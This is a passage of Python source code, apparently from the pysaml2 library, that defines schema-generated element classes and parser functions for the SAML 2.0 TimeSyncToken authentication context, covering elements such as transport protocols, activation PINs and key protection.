def dig_sig_from_string(xml_string):
    """Parse *xml_string* into a DigSig instance."""
    return saml2.create_class_from_xml_string(DigSig, xml_string)


class AsymmetricDecryption(PublicKeyType_):
    """The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:AsymmetricDecryption element."""

    c_tag = 'AsymmetricDecryption'
    c_namespace = NAMESPACE
    c_children = dict(PublicKeyType_.c_children)
    c_attributes = dict(PublicKeyType_.c_attributes)
    c_child_order = list(PublicKeyType_.c_child_order)
    c_cardinality = dict(PublicKeyType_.c_cardinality)


def asymmetric_decryption_from_string(xml_string):
    """Parse *xml_string* into an AsymmetricDecryption instance."""
    return saml2.create_class_from_xml_string(AsymmetricDecryption, xml_string)


class AsymmetricKeyAgreement(PublicKeyType_):
    """The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:AsymmetricKeyAgreement element."""

    c_tag = 'AsymmetricKeyAgreement'
    c_namespace = NAMESPACE
    c_children = dict(PublicKeyType_.c_children)
    c_attributes = dict(PublicKeyType_.c_attributes)
    c_child_order = list(PublicKeyType_.c_child_order)
    c_cardinality = dict(PublicKeyType_.c_cardinality)


def asymmetric_key_agreement_from_string(xml_string):
    """Parse *xml_string* into an AsymmetricKeyAgreement instance."""
    return saml2.create_class_from_xml_string(AsymmetricKeyAgreement,
                                              xml_string)
class IPAddress(ExtensionOnlyType_):
    """The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:IPAddress element."""

    c_tag = 'IPAddress'
    c_namespace = NAMESPACE
    # Independent copies of the parent's schema tables.
    c_children = dict(ExtensionOnlyType_.c_children)
    c_attributes = dict(ExtensionOnlyType_.c_attributes)
    c_child_order = list(ExtensionOnlyType_.c_child_order)
    c_cardinality = dict(ExtensionOnlyType_.c_cardinality)


def ip_address_from_string(xml_string):
    """Parse *xml_string* into an IPAddress instance."""
    return saml2.create_class_from_xml_string(IPAddress, xml_string)


class SharedSecretDynamicPlaintext(ExtensionOnlyType_):
    """The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:SharedSecretDynamicPlaintext element."""

    c_tag = 'SharedSecretDynamicPlaintext'
    c_namespace = NAMESPACE
    c_children = dict(ExtensionOnlyType_.c_children)
    c_attributes = dict(ExtensionOnlyType_.c_attributes)
    c_child_order = list(ExtensionOnlyType_.c_child_order)
    c_cardinality = dict(ExtensionOnlyType_.c_cardinality)


def shared_secret_dynamic_plaintext_from_string(xml_string):
    """Parse *xml_string* into a SharedSecretDynamicPlaintext instance."""
    return saml2.create_class_from_xml_string(SharedSecretDynamicPlaintext,
                                              xml_string)
class HTTP(ExtensionOnlyType_):
    """The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:HTTP element."""

    c_tag = 'HTTP'
    c_namespace = NAMESPACE
    # Independent copies of the parent's schema tables.
    c_children = dict(ExtensionOnlyType_.c_children)
    c_attributes = dict(ExtensionOnlyType_.c_attributes)
    c_child_order = list(ExtensionOnlyType_.c_child_order)
    c_cardinality = dict(ExtensionOnlyType_.c_cardinality)


def http_from_string(xml_string):
    """Parse *xml_string* into an HTTP instance."""
    return saml2.create_class_from_xml_string(HTTP, xml_string)


class IPSec(ExtensionOnlyType_):
    """The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:IPSec element."""

    c_tag = 'IPSec'
    c_namespace = NAMESPACE
    c_children = dict(ExtensionOnlyType_.c_children)
    c_attributes = dict(ExtensionOnlyType_.c_attributes)
    c_child_order = list(ExtensionOnlyType_.c_child_order)
    c_cardinality = dict(ExtensionOnlyType_.c_cardinality)


def ip_sec_from_string(xml_string):
    """Parse *xml_string* into an IPSec instance."""
    return saml2.create_class_from_xml_string(IPSec, xml_string)


class WTLS(ExtensionOnlyType_):
    """The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:WTLS element."""

    c_tag = 'WTLS'
    c_namespace = NAMESPACE
    c_children = dict(ExtensionOnlyType_.c_children)
    c_attributes = dict(ExtensionOnlyType_.c_attributes)
    c_child_order = list(ExtensionOnlyType_.c_child_order)
    c_cardinality = dict(ExtensionOnlyType_.c_cardinality)


def wtls_from_string(xml_string):
    """Parse *xml_string* into a WTLS instance."""
    return saml2.create_class_from_xml_string(WTLS, xml_string)
class MobileNetworkNoEncryption(ExtensionOnlyType_):
    """The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:MobileNetworkNoEncryption element."""

    c_tag = 'MobileNetworkNoEncryption'
    c_namespace = NAMESPACE
    # Independent copies of the parent's schema tables.
    c_children = dict(ExtensionOnlyType_.c_children)
    c_attributes = dict(ExtensionOnlyType_.c_attributes)
    c_child_order = list(ExtensionOnlyType_.c_child_order)
    c_cardinality = dict(ExtensionOnlyType_.c_cardinality)


def mobile_network_no_encryption_from_string(xml_string):
    """Parse *xml_string* into a MobileNetworkNoEncryption instance."""
    return saml2.create_class_from_xml_string(MobileNetworkNoEncryption,
                                              xml_string)


class MobileNetworkRadioEncryption(ExtensionOnlyType_):
    """The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:MobileNetworkRadioEncryption element."""

    c_tag = 'MobileNetworkRadioEncryption'
    c_namespace = NAMESPACE
    c_children = dict(ExtensionOnlyType_.c_children)
    c_attributes = dict(ExtensionOnlyType_.c_attributes)
    c_child_order = list(ExtensionOnlyType_.c_child_order)
    c_cardinality = dict(ExtensionOnlyType_.c_cardinality)


def mobile_network_radio_encryption_from_string(xml_string):
    """Parse *xml_string* into a MobileNetworkRadioEncryption instance."""
    return saml2.create_class_from_xml_string(MobileNetworkRadioEncryption,
                                              xml_string)


class MobileNetworkEndToEndEncryption(ExtensionOnlyType_):
    """The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:MobileNetworkEndToEndEncryption element."""

    c_tag = 'MobileNetworkEndToEndEncryption'
    c_namespace = NAMESPACE
    c_children = dict(ExtensionOnlyType_.c_children)
    c_attributes = dict(ExtensionOnlyType_.c_attributes)
    c_child_order = list(ExtensionOnlyType_.c_child_order)
    c_cardinality = dict(ExtensionOnlyType_.c_cardinality)


def mobile_network_end_to_end_encryption_from_string(xml_string):
    """Parse *xml_string* into a MobileNetworkEndToEndEncryption instance."""
    return saml2.create_class_from_xml_string(MobileNetworkEndToEndEncryption,
                                              xml_string)
class SSL(ExtensionOnlyType_):
    """The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:SSL element."""

    c_tag = 'SSL'
    c_namespace = NAMESPACE
    # Independent copies of the parent's schema tables.
    c_children = dict(ExtensionOnlyType_.c_children)
    c_attributes = dict(ExtensionOnlyType_.c_attributes)
    c_child_order = list(ExtensionOnlyType_.c_child_order)
    c_cardinality = dict(ExtensionOnlyType_.c_cardinality)


def ssl_from_string(xml_string):
    """Parse *xml_string* into an SSL instance."""
    return saml2.create_class_from_xml_string(SSL, xml_string)


class PSTN(ExtensionOnlyType_):
    """The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:PSTN element."""

    c_tag = 'PSTN'
    c_namespace = NAMESPACE
    c_children = dict(ExtensionOnlyType_.c_children)
    c_attributes = dict(ExtensionOnlyType_.c_attributes)
    c_child_order = list(ExtensionOnlyType_.c_child_order)
    c_cardinality = dict(ExtensionOnlyType_.c_cardinality)


def pstn_from_string(xml_string):
    """Parse *xml_string* into a PSTN instance."""
    return saml2.create_class_from_xml_string(PSTN, xml_string)


class ISDN(ExtensionOnlyType_):
    """The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:ISDN element."""

    c_tag = 'ISDN'
    c_namespace = NAMESPACE
    c_children = dict(ExtensionOnlyType_.c_children)
    c_attributes = dict(ExtensionOnlyType_.c_attributes)
    c_child_order = list(ExtensionOnlyType_.c_child_order)
    c_cardinality = dict(ExtensionOnlyType_.c_cardinality)


def isdn_from_string(xml_string):
    """Parse *xml_string* into an ISDN instance."""
    return saml2.create_class_from_xml_string(ISDN, xml_string)


class ADSL(ExtensionOnlyType_):
    """The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:ADSL element."""

    c_tag = 'ADSL'
    c_namespace = NAMESPACE
    c_children = dict(ExtensionOnlyType_.c_children)
    c_attributes = dict(ExtensionOnlyType_.c_attributes)
    c_child_order = list(ExtensionOnlyType_.c_child_order)
    c_cardinality = dict(ExtensionOnlyType_.c_cardinality)


def adsl_from_string(xml_string):
    """Parse *xml_string* into an ADSL instance."""
    return saml2.create_class_from_xml_string(ADSL, xml_string)
class SwitchAudit(ExtensionOnlyType_):
    """The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:SwitchAudit element."""

    c_tag = 'SwitchAudit'
    c_namespace = NAMESPACE
    # Independent copies of the parent's schema tables.
    c_children = dict(ExtensionOnlyType_.c_children)
    c_attributes = dict(ExtensionOnlyType_.c_attributes)
    c_child_order = list(ExtensionOnlyType_.c_child_order)
    c_cardinality = dict(ExtensionOnlyType_.c_cardinality)


def switch_audit_from_string(xml_string):
    """Parse *xml_string* into a SwitchAudit instance."""
    return saml2.create_class_from_xml_string(SwitchAudit, xml_string)


class DeactivationCallCenter(ExtensionOnlyType_):
    """The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:DeactivationCallCenter element."""

    c_tag = 'DeactivationCallCenter'
    c_namespace = NAMESPACE
    c_children = dict(ExtensionOnlyType_.c_children)
    c_attributes = dict(ExtensionOnlyType_.c_attributes)
    c_child_order = list(ExtensionOnlyType_.c_child_order)
    c_cardinality = dict(ExtensionOnlyType_.c_cardinality)


def deactivation_call_center_from_string(xml_string):
    """Parse *xml_string* into a DeactivationCallCenter instance."""
    return saml2.create_class_from_xml_string(DeactivationCallCenter,
                                              xml_string)
class IdentificationType_(SamlBase):
    """The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:IdentificationType element """

    c_tag = 'IdentificationType'
    c_namespace = NAMESPACE
    # Copies keep SamlBase's shared registries untouched.
    c_children = SamlBase.c_children.copy()
    c_attributes = SamlBase.c_attributes.copy()
    c_child_order = SamlBase.c_child_order[:]
    c_cardinality = SamlBase.c_cardinality.copy()
    # Optional (0..1) children, plus a repeatable (0..n) Extension child.
    c_children[
        '{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}PhysicalVerification'] = (
        'physical_verification', PhysicalVerification)
    c_cardinality['physical_verification'] = {"min": 0, "max": 1}
    c_children[
        '{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}WrittenConsent'] = (
        'written_consent', WrittenConsent)
    c_cardinality['written_consent'] = {"min": 0, "max": 1}
    c_children[
        '{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}GoverningAgreements'] = (
        'governing_agreements', GoverningAgreements)
    c_cardinality['governing_agreements'] = {"min": 0, "max": 1}
    c_children[
        '{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}Extension'] = (
        'extension', [Extension])
    c_cardinality['extension'] = {"min": 0}
    # Optional 'nym' XML attribute typed by NymType_.
    c_attributes['nym'] = ('nym', NymType_, False)
    c_child_order.extend(
        ['physical_verification', 'written_consent', 'governing_agreements',
         'extension'])

    def __init__(self,
                 physical_verification=None,
                 written_consent=None,
                 governing_agreements=None,
                 extension=None,
                 nym=None,
                 text=None,
                 extension_elements=None,
                 extension_attributes=None,
                 ):
        """Initialize the element's child-element and attribute slots."""
        SamlBase.__init__(self,
                          text=text,
                          extension_elements=extension_elements,
                          extension_attributes=extension_attributes,
                          )
        self.physical_verification = physical_verification
        self.written_consent = written_consent
        self.governing_agreements = governing_agreements
        self.extension = extension or []
        self.nym = nym
def identification_type__from_string(xml_string):
    """Build an IdentificationType_ instance by parsing *xml_string*."""
    return saml2.create_class_from_xml_string(IdentificationType_, xml_string)
class AuthenticatorTransportProtocolType_(SamlBase):
    """The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:AuthenticatorTransportProtocolType element """

    c_tag = 'AuthenticatorTransportProtocolType'
    c_namespace = NAMESPACE
    # Copies keep SamlBase's shared registries untouched.
    c_children = SamlBase.c_children.copy()
    c_attributes = SamlBase.c_attributes.copy()
    c_child_order = SamlBase.c_child_order[:]
    c_cardinality = SamlBase.c_cardinality.copy()
    # One optional (0..1) child per transport protocol, plus a repeatable
    # (0..n) Extension child.
    c_children['{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}HTTP'] = (
        'http', HTTP)
    c_cardinality['http'] = {"min": 0, "max": 1}
    c_children['{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}SSL'] = (
        'ssl', SSL)
    c_cardinality['ssl'] = {"min": 0, "max": 1}
    c_children[
        '{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}MobileNetworkNoEncryption'] = (
        'mobile_network_no_encryption', MobileNetworkNoEncryption)
    c_cardinality['mobile_network_no_encryption'] = {"min": 0, "max": 1}
    c_children[
        '{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}MobileNetworkRadioEncryption'] = (
        'mobile_network_radio_encryption', MobileNetworkRadioEncryption)
    c_cardinality['mobile_network_radio_encryption'] = {"min": 0, "max": 1}
    c_children[
        '{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}MobileNetworkEndToEndEncryption'] = (
        'mobile_network_end_to_end_encryption', MobileNetworkEndToEndEncryption)
    c_cardinality['mobile_network_end_to_end_encryption'] = {"min": 0, "max": 1}
    c_children['{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}WTLS'] = (
        'wtls', WTLS)
    c_cardinality['wtls'] = {"min": 0, "max": 1}
    c_children[
        '{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}IPSec'] = (
        'ip_sec', IPSec)
    c_cardinality['ip_sec'] = {"min": 0, "max": 1}
    c_children['{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}PSTN'] = (
        'pstn', PSTN)
    c_cardinality['pstn'] = {"min": 0, "max": 1}
    c_children['{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}ISDN'] = (
        'isdn', ISDN)
    c_cardinality['isdn'] = {"min": 0, "max": 1}
    c_children['{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}ADSL'] = (
        'adsl', ADSL)
    c_cardinality['adsl'] = {"min": 0, "max": 1}
    c_children[
        '{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}Extension'] = (
        'extension', [Extension])
    c_cardinality['extension'] = {"min": 0}
    c_child_order.extend(['http', 'ssl', 'mobile_network_no_encryption',
                          'mobile_network_radio_encryption',
                          'mobile_network_end_to_end_encryption', 'wtls',
                          'ip_sec', 'pstn', 'isdn', 'adsl', 'extension'])

    def __init__(self,
                 http=None,
                 ssl=None,
                 mobile_network_no_encryption=None,
                 mobile_network_radio_encryption=None,
                 mobile_network_end_to_end_encryption=None,
                 wtls=None,
                 ip_sec=None,
                 pstn=None,
                 isdn=None,
                 adsl=None,
                 extension=None,
                 text=None,
                 extension_elements=None,
                 extension_attributes=None,
                 ):
        """Initialize the element's child-element slots."""
        SamlBase.__init__(self,
                          text=text,
                          extension_elements=extension_elements,
                          extension_attributes=extension_attributes,
                          )
        self.http = http
        self.ssl = ssl
        self.mobile_network_no_encryption = mobile_network_no_encryption
        self.mobile_network_radio_encryption = mobile_network_radio_encryption
        self.mobile_network_end_to_end_encryption = mobile_network_end_to_end_encryption
        self.wtls = wtls
        self.ip_sec = ip_sec
        self.pstn = pstn
        self.isdn = isdn
        self.adsl = adsl
        self.extension = extension or []
def authenticator_transport_protocol_type__from_string(xml_string):
    """Build an AuthenticatorTransportProtocolType_ instance from XML."""
    return saml2.create_class_from_xml_string(
        AuthenticatorTransportProtocolType_, xml_string)
class RestrictedPassword(RestrictedPasswordType_):
    """The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:RestrictedPassword element."""

    c_tag = 'RestrictedPassword'
    c_namespace = NAMESPACE
    # Independent copies of the parent's schema tables.
    c_children = dict(RestrictedPasswordType_.c_children)
    c_attributes = dict(RestrictedPasswordType_.c_attributes)
    c_child_order = list(RestrictedPasswordType_.c_child_order)
    c_cardinality = dict(RestrictedPasswordType_.c_cardinality)


def restricted_password_from_string(xml_string):
    """Parse *xml_string* into a RestrictedPassword instance."""
    return saml2.create_class_from_xml_string(RestrictedPassword, xml_string)
class ActivationPinType_(SamlBase):
    """The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:ActivationPinType element """

    c_tag = 'ActivationPinType'
    c_namespace = NAMESPACE
    # Copies keep SamlBase's shared registries untouched.
    c_children = SamlBase.c_children.copy()
    c_attributes = SamlBase.c_attributes.copy()
    c_child_order = SamlBase.c_child_order[:]
    c_cardinality = SamlBase.c_cardinality.copy()
    # Optional (0..1) children plus a repeatable (0..n) Extension child.
    c_children[
        '{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}Length'] = (
        'length', Length)
    c_cardinality['length'] = {"min": 0, "max": 1}
    c_children[
        '{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}Alphabet'] = (
        'alphabet', Alphabet)
    c_cardinality['alphabet'] = {"min": 0, "max": 1}
    c_children[
        '{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}Generation'] = (
        'generation', Generation)
    c_cardinality['generation'] = {"min": 0, "max": 1}
    c_children[
        '{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}ActivationLimit'] = (
        'activation_limit', ActivationLimit)
    c_cardinality['activation_limit'] = {"min": 0, "max": 1}
    c_children[
        '{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}Extension'] = (
        'extension', [Extension])
    c_cardinality['extension'] = {"min": 0}
    c_child_order.extend(
        ['length', 'alphabet', 'generation', 'activation_limit', 'extension'])

    def __init__(self,
                 length=None,
                 alphabet=None,
                 generation=None,
                 activation_limit=None,
                 extension=None,
                 text=None,
                 extension_elements=None,
                 extension_attributes=None,
                 ):
        """Initialize the element's child-element slots."""
        SamlBase.__init__(self,
                          text=text,
                          extension_elements=extension_elements,
                          extension_attributes=extension_attributes,
                          )
        self.length = length
        self.alphabet = alphabet
        self.generation = generation
        self.activation_limit = activation_limit
        self.extension = extension or []
def activation_pin_type__from_string(xml_string):
    """Build an ActivationPinType_ instance by parsing *xml_string*."""
    return saml2.create_class_from_xml_string(ActivationPinType_, xml_string)
class SecurityAuditType_(SamlBase):
    """The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:SecurityAuditType element """

    c_tag = 'SecurityAuditType'
    c_namespace = NAMESPACE
    # Copies keep SamlBase's shared registries untouched.
    c_children = SamlBase.c_children.copy()
    c_attributes = SamlBase.c_attributes.copy()
    c_child_order = SamlBase.c_child_order[:]
    c_cardinality = SamlBase.c_cardinality.copy()
    # Optional (0..1) SwitchAudit child plus repeatable Extension child.
    c_children[
        '{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}SwitchAudit'] = (
        'switch_audit', SwitchAudit)
    c_cardinality['switch_audit'] = {"min": 0, "max": 1}
    c_children[
        '{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}Extension'] = (
        'extension', [Extension])
    c_cardinality['extension'] = {"min": 0}
    c_child_order.extend(['switch_audit', 'extension'])

    def __init__(self,
                 switch_audit=None,
                 extension=None,
                 text=None,
                 extension_elements=None,
                 extension_attributes=None,
                 ):
        """Initialize the element's child-element slots."""
        SamlBase.__init__(self,
                          text=text,
                          extension_elements=extension_elements,
                          extension_attributes=extension_attributes,
                          )
        self.switch_audit = switch_audit
        self.extension = extension or []
def security_audit_type__from_string(xml_string):
    """Build a SecurityAuditType_ instance by parsing *xml_string*."""
    return saml2.create_class_from_xml_string(SecurityAuditType_, xml_string)
class Identification(IdentificationType_):
    """The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:Identification element."""

    c_tag = 'Identification'
    c_namespace = NAMESPACE
    # Independent copies of the parent's schema tables.
    c_children = dict(IdentificationType_.c_children)
    c_attributes = dict(IdentificationType_.c_attributes)
    c_child_order = list(IdentificationType_.c_child_order)
    c_cardinality = dict(IdentificationType_.c_cardinality)


def identification_from_string(xml_string):
    """Parse *xml_string* into an Identification instance."""
    return saml2.create_class_from_xml_string(Identification, xml_string)


class ActivationPin(ActivationPinType_):
    """The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:ActivationPin element."""

    c_tag = 'ActivationPin'
    c_namespace = NAMESPACE
    c_children = dict(ActivationPinType_.c_children)
    c_attributes = dict(ActivationPinType_.c_attributes)
    c_child_order = list(ActivationPinType_.c_child_order)
    c_cardinality = dict(ActivationPinType_.c_cardinality)


def activation_pin_from_string(xml_string):
    """Parse *xml_string* into an ActivationPin instance."""
    return saml2.create_class_from_xml_string(ActivationPin, xml_string)
class AuthenticatorTransportProtocol(AuthenticatorTransportProtocolType_):
    """The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:AuthenticatorTransportProtocol element."""

    c_tag = 'AuthenticatorTransportProtocol'
    c_namespace = NAMESPACE
    # Independent copies of the parent's schema tables.
    c_children = dict(AuthenticatorTransportProtocolType_.c_children)
    c_attributes = dict(AuthenticatorTransportProtocolType_.c_attributes)
    c_child_order = list(AuthenticatorTransportProtocolType_.c_child_order)
    c_cardinality = dict(AuthenticatorTransportProtocolType_.c_cardinality)


def authenticator_transport_protocol_from_string(xml_string):
    """Parse *xml_string* into an AuthenticatorTransportProtocol instance."""
    return saml2.create_class_from_xml_string(AuthenticatorTransportProtocol,
                                              xml_string)
class SecurityAudit(SecurityAuditType_):
    """The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:SecurityAudit element."""

    c_tag = 'SecurityAudit'
    c_namespace = NAMESPACE
    # Independent copies of the parent's schema tables.
    c_children = dict(SecurityAuditType_.c_children)
    c_attributes = dict(SecurityAuditType_.c_attributes)
    c_child_order = list(SecurityAuditType_.c_child_order)
    c_cardinality = dict(SecurityAuditType_.c_cardinality)


def security_audit_from_string(xml_string):
    """Parse *xml_string* into a SecurityAudit instance."""
    return saml2.create_class_from_xml_string(SecurityAudit, xml_string)
class OperationalProtectionType_(SamlBase):
    """The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:OperationalProtectionType element """

    c_tag = 'OperationalProtectionType'
    c_namespace = NAMESPACE
    # Copies keep SamlBase's shared registries untouched.
    c_children = SamlBase.c_children.copy()
    c_attributes = SamlBase.c_attributes.copy()
    c_child_order = SamlBase.c_child_order[:]
    c_cardinality = SamlBase.c_cardinality.copy()
    # Two optional (0..1) children plus repeatable Extension child.
    c_children[
        '{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}SecurityAudit'] = (
        'security_audit', SecurityAudit)
    c_cardinality['security_audit'] = {"min": 0, "max": 1}
    c_children[
        '{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}DeactivationCallCenter'] = (
        'deactivation_call_center', DeactivationCallCenter)
    c_cardinality['deactivation_call_center'] = {"min": 0, "max": 1}
    c_children[
        '{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}Extension'] = (
        'extension', [Extension])
    c_cardinality['extension'] = {"min": 0}
    c_child_order.extend(
        ['security_audit', 'deactivation_call_center', 'extension'])

    def __init__(self,
                 security_audit=None,
                 deactivation_call_center=None,
                 extension=None,
                 text=None,
                 extension_elements=None,
                 extension_attributes=None,
                 ):
        """Initialize the element's child-element slots."""
        SamlBase.__init__(self,
                          text=text,
                          extension_elements=extension_elements,
                          extension_attributes=extension_attributes,
                          )
        self.security_audit = security_audit
        self.deactivation_call_center = deactivation_call_center
        self.extension = extension or []
def operational_protection_type__from_string(xml_string):
    """Build an OperationalProtectionType_ instance by parsing *xml_string*."""
    return saml2.create_class_from_xml_string(OperationalProtectionType_,
                                              xml_string)
class KeyActivationType_(SamlBase):
    """The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:KeyActivationType element """

    c_tag = 'KeyActivationType'
    c_namespace = NAMESPACE
    # Copies keep SamlBase's shared registries untouched.
    c_children = SamlBase.c_children.copy()
    c_attributes = SamlBase.c_attributes.copy()
    c_child_order = SamlBase.c_child_order[:]
    c_cardinality = SamlBase.c_cardinality.copy()
    # Optional (0..1) ActivationPin child plus repeatable Extension child.
    c_children[
        '{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}ActivationPin'] = (
        'activation_pin', ActivationPin)
    c_cardinality['activation_pin'] = {"min": 0, "max": 1}
    c_children[
        '{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}Extension'] = (
        'extension', [Extension])
    c_cardinality['extension'] = {"min": 0}
    c_child_order.extend(['activation_pin', 'extension'])

    def __init__(self,
                 activation_pin=None,
                 extension=None,
                 text=None,
                 extension_elements=None,
                 extension_attributes=None,
                 ):
        """Initialize the element's child-element slots."""
        SamlBase.__init__(self,
                          text=text,
                          extension_elements=extension_elements,
                          extension_attributes=extension_attributes,
                          )
        self.activation_pin = activation_pin
        self.extension = extension or []
def key_activation_type__from_string(xml_string):
    """Build a KeyActivationType_ instance by parsing *xml_string*."""
    return saml2.create_class_from_xml_string(KeyActivationType_, xml_string)
class KeyActivation(KeyActivationType_):
    """The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:KeyActivation element """

    # Concrete element: same content model as its *Type_ base, new tag.
    c_tag = 'KeyActivation'
    c_namespace = NAMESPACE
    c_children = KeyActivationType_.c_children.copy()
    c_attributes = KeyActivationType_.c_attributes.copy()
    c_child_order = KeyActivationType_.c_child_order[:]
    c_cardinality = KeyActivationType_.c_cardinality.copy()


def key_activation_from_string(xml_string):
    """Build a KeyActivation instance from an XML string."""
    return saml2.create_class_from_xml_string(KeyActivation, xml_string)
class OperationalProtection(OperationalProtectionType_):
    """The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:OperationalProtection element """

    # Concrete element: same content model as its *Type_ base, new tag.
    c_tag = 'OperationalProtection'
    c_namespace = NAMESPACE
    c_children = OperationalProtectionType_.c_children.copy()
    c_attributes = OperationalProtectionType_.c_attributes.copy()
    c_child_order = OperationalProtectionType_.c_child_order[:]
    c_cardinality = OperationalProtectionType_.c_cardinality.copy()


def operational_protection_from_string(xml_string):
    """Build an OperationalProtection instance from an XML string."""
    return saml2.create_class_from_xml_string(OperationalProtection, xml_string)
class PrivateKeyProtectionType_(SamlBase):
    """The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:PrivateKeyProtectionType element """

    c_tag = 'PrivateKeyProtectionType'
    c_namespace = NAMESPACE
    c_children = SamlBase.c_children.copy()
    c_attributes = SamlBase.c_attributes.copy()
    c_child_order = SamlBase.c_child_order[:]
    c_cardinality = SamlBase.c_cardinality.copy()
    c_children['{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}KeyActivation'] = ('key_activation', KeyActivation)
    c_cardinality['key_activation'] = {"min": 0, "max": 1}
    c_children['{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}KeyStorage'] = ('key_storage', KeyStorage)
    c_cardinality['key_storage'] = {"min": 0, "max": 1}
    c_children['{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}KeySharing'] = ('key_sharing', KeySharing)
    c_cardinality['key_sharing'] = {"min": 0, "max": 1}
    c_children['{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}Extension'] = ('extension', [Extension])
    c_cardinality['extension'] = {"min": 0}
    c_child_order.extend(
        ['key_activation', 'key_storage', 'key_sharing', 'extension'])

    def __init__(self,
                 key_activation=None,
                 key_storage=None,
                 key_sharing=None,
                 extension=None,
                 text=None,
                 extension_elements=None,
                 extension_attributes=None):
        """Initialise a PrivateKeyProtectionType element instance."""
        SamlBase.__init__(self, text=text,
                          extension_elements=extension_elements,
                          extension_attributes=extension_attributes)
        self.key_activation = key_activation
        self.key_storage = key_storage
        self.key_sharing = key_sharing
        self.extension = extension or []


def private_key_protection_type__from_string(xml_string):
    """Build a PrivateKeyProtectionType_ instance from an XML string."""
    return saml2.create_class_from_xml_string(
        PrivateKeyProtectionType_, xml_string)
class SecretKeyProtectionType_(SamlBase):
    """The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:SecretKeyProtectionType element """

    c_tag = 'SecretKeyProtectionType'
    c_namespace = NAMESPACE
    c_children = SamlBase.c_children.copy()
    c_attributes = SamlBase.c_attributes.copy()
    c_child_order = SamlBase.c_child_order[:]
    c_cardinality = SamlBase.c_cardinality.copy()
    c_children['{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}KeyActivation'] = ('key_activation', KeyActivation)
    c_cardinality['key_activation'] = {"min": 0, "max": 1}
    c_children['{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}KeyStorage'] = ('key_storage', KeyStorage)
    c_cardinality['key_storage'] = {"min": 0, "max": 1}
    c_children['{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}Extension'] = ('extension', [Extension])
    c_cardinality['extension'] = {"min": 0}
    c_child_order.extend(['key_activation', 'key_storage', 'extension'])

    def __init__(self,
                 key_activation=None,
                 key_storage=None,
                 extension=None,
                 text=None,
                 extension_elements=None,
                 extension_attributes=None):
        """Initialise a SecretKeyProtectionType element instance."""
        SamlBase.__init__(self, text=text,
                          extension_elements=extension_elements,
                          extension_attributes=extension_attributes)
        self.key_activation = key_activation
        self.key_storage = key_storage
        self.extension = extension or []


def secret_key_protection_type__from_string(xml_string):
    """Build a SecretKeyProtectionType_ instance from an XML string."""
    return saml2.create_class_from_xml_string(
        SecretKeyProtectionType_, xml_string)
